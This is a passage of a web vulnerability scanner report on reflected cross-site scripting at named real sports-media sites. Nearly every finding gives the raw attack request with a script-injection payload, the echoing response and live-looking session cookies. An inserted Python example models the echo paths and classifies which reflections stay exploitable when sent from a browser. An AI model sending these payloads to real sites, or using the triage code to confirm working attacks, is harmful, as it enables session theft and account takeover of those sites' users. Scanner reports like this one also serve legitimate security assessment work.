GET /pages/videoembed?c190b"><script>alert(1)</script>920d774f729=1 HTTP/1.1
Host: www.csnwashington.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 45747
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web4.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="c190b"><script>alert(1)</script>920d774f729" id = "c190b">
...[SNIP]...

2.421. http://www.csssports.com/common/ad_count.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/ad_count.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b5c2<script>alert(1)</script>7dc22b3acfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common7b5c2<script>alert(1)</script>7dc22b3acfd/ad_count.php HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:21 GMT
Content-Length: 771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common7b5c2<script>alert(1)</script>7dc22b3acfd/ad_count.php"</strong>
...[SNIP]...

2.422. http://www.csssports.com/common/ad_count.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/ad_count.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3278a<script>alert(1)</script>2d86d8be90e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/ad_count.php3278a<script>alert(1)</script>2d86d8be90e HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:22 GMT
Content-Length: 771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/ad_count.php3278a<script>alert(1)</script>2d86d8be90e"</strong>
...[SNIP]...

2.423. http://www.csssports.com/common/dynrss/dynrss_3242_landing_.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/dynrss/dynrss_3242_landing_.rss

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87002<script>alert(1)</script>06dd5b174b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common87002<script>alert(1)</script>06dd5b174b2/dynrss/dynrss_3242_landing_.rss HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:29 GMT
Content-Length: 790
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common87002<script>alert(1)</script>06dd5b174b2/dynrss/dynrss_3242_landing_.rss"</strong>
...[SNIP]...

2.424. http://www.csssports.com/common/dynrss/dynrss_3242_landing_.rss [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/dynrss/dynrss_3242_landing_.rss

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f644<script>alert(1)</script>37bbe352fe8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/dynrss9f644<script>alert(1)</script>37bbe352fe8/dynrss_3242_landing_.rss HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:29 GMT
Content-Length: 790
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/dynrss9f644<script>alert(1)</script>37bbe352fe8/dynrss_3242_landing_.rss"</strong>
...[SNIP]...

2.425. http://www.csssports.com/common/dynrss/dynrss_3242_landing_.rss [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/dynrss/dynrss_3242_landing_.rss

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b6d45<script>alert(1)</script>d9a63c72efe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/dynrss/dynrss_3242_landing_.rssb6d45<script>alert(1)</script>d9a63c72efe HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:30 GMT
Content-Length: 790
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/dynrss/dynrss_3242_landing_.rssb6d45<script>alert(1)</script>d9a63c72efe"</strong>
...[SNIP]...

2.426. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86a62<script>alert(1)</script>bfb4510976b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common86a62<script>alert(1)</script>bfb4510976b/global_flash/player/player.php HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:24 GMT
Content-Length: 789
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common86a62<script>alert(1)</script>bfb4510976b/global_flash/player/player.php"</strong>
...[SNIP]...

2.427. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26ee5<script>alert(1)</script>1059f091ee8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash26ee5<script>alert(1)</script>1059f091ee8/player/player.php HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:24 GMT
Content-Length: 789
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash26ee5<script>alert(1)</script>1059f091ee8/player/player.php"</strong>
...[SNIP]...

2.428. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9f00a<script>alert(1)</script>23a7a268b9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player9f00a<script>alert(1)</script>23a7a268b9f/player.php HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:24 GMT
Content-Length: 789
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player9f00a<script>alert(1)</script>23a7a268b9f/player.php"</strong>
...[SNIP]...

2.429. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4dfaf<script>alert(1)</script>d0647911e58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php4dfaf<script>alert(1)</script>d0647911e58 HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:25 GMT
Content-Length: 789
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php4dfaf<script>alert(1)</script>d0647911e58"</strong>
...[SNIP]...

2.430. http://www.csssports.com/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d0e3<script>alert(1)</script>2dd732714b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/6d0e3<script>alert(1)</script>2dd732714b0 HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:21 GMT
Content-Length: 762
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/6d0e3<script>alert(1)</script>2dd732714b0"</strong>
...[SNIP]...

2.431. http://www.csssports.com/pages/landing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /pages/landing/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 200d1<script>alert(1)</script>8d9a9f99de5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages200d1<script>alert(1)</script>8d9a9f99de5/landing/ HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:27 GMT
Content-Length: 766
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages200d1<script>alert(1)</script>8d9a9f99de5/landing/"</strong>
...[SNIP]...

2.432. http://www.csssports.com/pages/landing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /pages/landing/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14140<script>alert(1)</script>998c32cd570 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/landing14140<script>alert(1)</script>998c32cd570/ HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:27 GMT
Content-Length: 785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/landing14140<script>alert(1)</script>998c32cd570/"</strong>
...[SNIP]...
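
Two things are worth checking before accepting the path-based findings above at face value: how the echoed value reaches the page, and what a real browser would actually send. In 2.430 the request target is echoed directly by the 404 page; in 2.432 it is echoed only after the redirect to /common/404.html?p=..., so a checker has to follow the Location header the way a browser does. Separately, browsers that implement the WHATWG URL standard percent-encode <, > and " in a path before sending it, whereas the scanner sent them raw; a path-based reflection is therefore reachable from a browser only if the server decodes the value before echoing it, which a query-string parameter such as p= normally is and a raw request line normally is not. The Python below is added here as an example; it is not part of the scanner output or of the site's code. It models both echo paths with a constructed in-process server (model_server and everything about its internals are assumptions), follows redirects, and classifies the reflection context of the report's own payload markers, once sent raw and once sent as a browser would encode them.

```python
"""Offline triage of reflected-input findings of the kind listed in this report.

Added example, not part of the scanner output or of the application's code.
model_server() is a constructed stand-in for the behaviour the report shows:
a missing /pages/... URL redirects to /common/404.html?p=<requested target>
and the 404 page echoes p; a missing /common/js/... URL echoes the request
target directly.  Everything about its internals is an assumption.
"""
import html
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Characters a browser that follows the WHATWG URL standard percent-encodes in a
# path before sending it.  The scanner sent them raw, which is why the request
# lines in this report contain literal <, > and ".
BROWSER_PATH_ENCODE = ' "<>`{}'
REDIRECT_CODES = {301, 302, 303, 307, 308}


def as_browser_would_send(target: str) -> str:
    """Percent-encode the characters a browser never sends raw in a URL path."""
    return "".join(f"%{ord(c):02X}" if c in BROWSER_PATH_ENCODE else c for c in target)


@dataclass
class Response:
    status: int
    headers: dict
    body: str


def model_server(target: str) -> Response:
    """Constructed model of the two echo paths seen in the report (not real site code)."""
    url = urlsplit(target)
    if url.path == "/common/404.html":
        # Query parsing percent-decodes, so whatever the browser encoded comes back raw.
        p = parse_qs(url.query).get("p", [""])[0]
        return Response(404, {}, f'<p>The page <strong>"{p}"</strong> was not found.</p>')
    if url.path.startswith("/common/js/"):
        # Echoes the request target exactly as received, without decoding it.
        return Response(404, {}, f'<p>The page <strong>"{target}"</strong> was not found.</p>')
    if url.path.startswith("/pages/"):
        return Response(302, {"Location": "/common/404.html?p=" + target}, "")
    return Response(200, {}, "<html><body>ok</body></html>")


def fetch_following_redirects(fetch, target: str, max_hops: int = 5):
    """Follow Location headers as a browser would; return the final Response and the targets visited."""
    hops = [target]
    resp = fetch(target)
    while resp.status in REDIRECT_CODES and len(hops) <= max_hops:
        target = resp.headers["Location"]
        hops.append(target)
        resp = fetch(target)
    return resp, hops


@dataclass
class Reflection:
    context: str       # text | attr_dq | attr_sq | attr_unquoted | html_encoded | url_encoded | none
    exploitable: bool  # the payload's <script> survives as live markup in that context


def classify_reflection(body: str, payload: str) -> Reflection:
    """Find the scanner's payload marker in an HTML body and classify where it landed."""
    idx = body.find(payload)
    if idx == -1:
        if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
            return Reflection("html_encoded", False)
        if as_browser_would_send(payload) in body:
            return Reflection("url_encoded", False)
        return Reflection("none", False)
    before = body[:idx]
    if before.rfind("<") <= before.rfind(">"):
        # Between tags: a raw <script> in the payload is parsed as markup.
        return Reflection("text", "<script" in payload)
    # Inside a tag: an odd count of a quote character since the tag opened means
    # the payload sits inside an attribute delimited by that character.
    tag_so_far = before[before.rfind("<"):]
    for quote_char, name in (('"', "attr_dq"), ("'", "attr_sq")):
        if tag_so_far.count(quote_char) % 2 == 1:
            # Exploitable only if the payload closes the attribute and the tag first.
            return Reflection(name, quote_char + ">" in payload and "<script" in payload)
    return Reflection("attr_unquoted", "<script" in payload)


def triage(fetch, target: str, payload: str, *, browser_encode: bool) -> Reflection:
    """Send the attack raw (as the scanner did) or as a browser would, follow redirects, classify."""
    sent = as_browser_would_send(target) if browser_encode else target
    return classify_reflection(fetch_following_redirects(fetch, sent)[0].body, payload)


# Attack targets and payload markers taken from findings 2.430 and 2.432.
SAMPLES = {
    "2.430 direct echo": ("/common/js/6d0e3<script>alert(1)</script>2dd732714b0",
                          "6d0e3<script>alert(1)</script>2dd732714b0"),
    "2.432 via redirect": ("/pages/landing14140<script>alert(1)</script>998c32cd570/",
                           "14140<script>alert(1)</script>998c32cd570"),
}

if __name__ == "__main__":
    for label, (target, payload) in SAMPLES.items():
        for enc in (False, True):
            r = triage(model_server, target, payload, browser_encode=enc)
            print(f"{label:19} browser_encode={enc!s:5} -> {r.context}, exploitable={r.exploitable}")
```

Under this model the direct echo of 2.430 degrades to a harmless percent-encoded string once the request comes from a browser, while the redirected variant of 2.432 stays exploitable because p= is decoded by the query parser before it is echoed. Against the live site the only way to settle which case applies is to send the browser-encoded form and look at the final response; classify_reflection reports that as "url_encoded" versus "text".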

2.433. http://www.csssports.com/pages/landing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /pages/landing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6dbf"><script>alert(1)</script>3e8dff6d570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/landing/?c6dbf"><script>alert(1)</script>3e8dff6d570=1 HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:26 GMT
Content-Length: 21247
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web1.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="c6dbf"><script>alert(1)</script>3e8dff6d570" id = "c6dbf">
...[SNIP]...

2.434. http://www.csssports.com/pages/landing_09 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /pages/landing_09

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50f5a<script>alert(1)</script>bb6623216d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages50f5a<script>alert(1)</script>bb6623216d6/landing_09 HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:27 GMT
Content-Length: 768
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages50f5a<script>alert(1)</script>bb6623216d6/landing_09"</strong>
...[SNIP]...

2.435. http://www.csssports.com/pages/landing_09 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csssports.com
Path:   /pages/landing_09

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28777<script>alert(1)</script>8208de7ceaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/landing_0928777<script>alert(1)</script>8208de7ceaf HTTP/1.1
Host: www.csssports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=80897029.1292783235.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=6b05ec11a461d9a8387664878226f26a; __utma=80897029.607252618.1292783235.1292783235.1292783235.1; __utmc=80897029; __utmb=80897029;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:28 GMT
Content-Length: 787
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
